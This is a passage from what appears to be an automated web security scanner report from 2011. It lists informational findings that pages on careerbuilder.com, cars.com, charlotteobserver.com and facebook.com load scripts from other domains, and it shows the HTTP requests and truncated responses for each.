X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dbe0a97eaa0d435580963487f7d94f26-368400317-wg-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:17 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/rdbsearchlicenselinkcontrol.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img.icbdr.com/images/jp/content/js/jp-products-priceswitch.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.24. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34350
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=724f92f936a743f6a3638215db1bfbe7-368400317-x3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:16 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR39
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.25. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182682
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR29
Date: Sun, 04 Sep 2011 01:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODMxMzQ0NjkxZGRl5+DncdAXWQpSCrKhGSIVwvdWCg==" />

       
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cookie.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/joblistalternatingstylesfix.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/ajaxlogin.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/dialogoverflash.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/savejob.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/emailjob.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/searchbar.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.26. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/companies/companysearch.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242405
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 04 Sep 2011 01:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.27. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/jobs/jobfindadv.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50843
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
zOmNvbnRyYWN0b3IFC2FzOnBhcnR0aW1lBQlhczppbnRlcm4FD2FzOnNlYXNvbmFsVGVtcAUWYXM6ZXhfUmVnaW9uYWxOYXRpb25hbAUUYXM6ZXhfbm9udHJhZGl0aW9uYWwFE2FzOnNfaW5jbHVkZXplcm9wYXlRRBwJE1ro9PC9XK78A2BXQ565FQ==" />

       
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/searchbar.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.28. http://www.cars.com/go/advice/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 45669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=728x90,970x66;area=advice.adviceindex;aff=national;lang=en;u=728x90,970x66||national|||||||||advice.adviceindex|||||en;tile=1;ord=1315099529728?"></script>
...[SNIP]...
</div>


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=300x250;area=advice.adviceindex;aff=national;lang=en;u=300x250||national|||||||||advice.adviceindex|||||en;tile=2;ord=1315099529728?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.29. http://www.cars.com/go/advice/shopping/cpo/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/shopping/cpo/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/advice/shopping/cpo/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 28814
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/javascript" src="/js/lib/jquery/1_3_2/jquery.min.js"></s
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=728x90,970x66;area=research.cpo.cpo;aff=national;lang=en;u=728x90,970x66||national|||||||||research.cpo.cpo|||||en;tile=1;ord=1315099529989?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=cpopixel;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||cpopixel|research.cpo.cpo|||||en;tile=2;ord=1315099529989?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=bglogo;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||bglogo|research.cpo.cpo|||||en;tile=3;ord=1315099529989?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=300x250;area=research.cpo.cpo;aff=national;lang=en;u=300x250||national|||||||||research.cpo.cpo|||||en;tile=4;ord=1315099529989?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.30. http://www.cars.com/go/crp/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/crp/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Wi7Ob1JlqbXe34f3Rg8tOMg:15mijjg76; Path=/
Set-Cookie: Registration=currentUserId:os2h00mIJBCqaXrpC3yMnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQuctqROfU3Gx6shhrLor0ffNW2iOUVe7nWvIF4VeWiUYU=; Expires=Fri, 02 Sep 2016 01:25:27 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=national; Expires=Sun, 25 Sep 2011 01:25:27 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   

<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=728x90,970x66;area=research.research;aff=national;lang=en;u=728x90,970x66||national|||||||||research.research|||||en;tile=1;ord=1315099527256?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=300x250;area=research.research;aff=national;lang=en;u=300x250||national|||||||||research.research|||||en;tile=2;ord=1315099527256?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=1x1;detail=regional_shortcut;area=research.research;aff=national;lang=en;u=1x1||national||||||||regional_shortcut|research.research|||||en;tile=3;ord=1315099527256?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.31. http://www.cars.com/go/kbb/kbbInput.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/kbb/kbbInput.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/kbb/kbbInput.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:20 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 18484
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=728x90,970x66;area=research.kbb;aff=national;lang=en;u=728x90,970x66||national|||||||||research.kbb|||||en;tile=1;ord=1315099537503?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=160x600;area=research.kbb;aff=national;lang=en;u=160x600||national|||||||||research.kbb|||||en;tile=2;ord=1315099537503?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.32. http://www.cars.com/go/photogalleries/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/photogalleries/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/photogalleries/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:17 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 35059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>


   <title>Car Phot
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=728x90,970x66;area=research.photogallery;aff=national;lang=en;u=728x90,970x66||national|||||||||research.photogallery|||||en;tile=1;ord=1315099534200?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=1x1;detail=bglogo;area=research.photogallery;aff=national;lang=en;u=1x1||national||||||||bglogo|research.photogallery|||||en;tile=2;ord=1315099534200?"></script>
...[SNIP]...



<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=160x600;area=research.photogallery;aff=national;lang=en;u=160x600||national|||||||||research.photogallery|||||en;tile=3;ord=1315099534200?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.33. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/03/2577566/raceday-danica-already-gone.html HTTP/1.1
Host: www.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 110282
Expires: Sun, 04 Sep 2011 01:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:00:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</a>

<script type="text/javascript"
src="http://s7.addthis.com/js/200/addthis_widget.js">
</script>
...[SNIP]...
<div id='mi_top_job' style="">
<script type='text/javascript' src='http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBCB_CO&rssid=CB_CO_jbstrm&num=50&kw=CustomField3:CHARLOTTTJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]'></script>
...[SNIP]...
<div class="railunit">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...

21.34. http://www.charlotteobserver.com/advertising/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /advertising/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertising/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.35. http://www.charlotteobserver.com/newsroom/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /newsroom/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newsroom/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.36. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.199.40
Connection: close
Date: Sun, 04 Sep 2011 01:25:57 GMT
Content-Length: 4255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/GjAkfCLY2D7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
...[SNIP]...

21.37. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

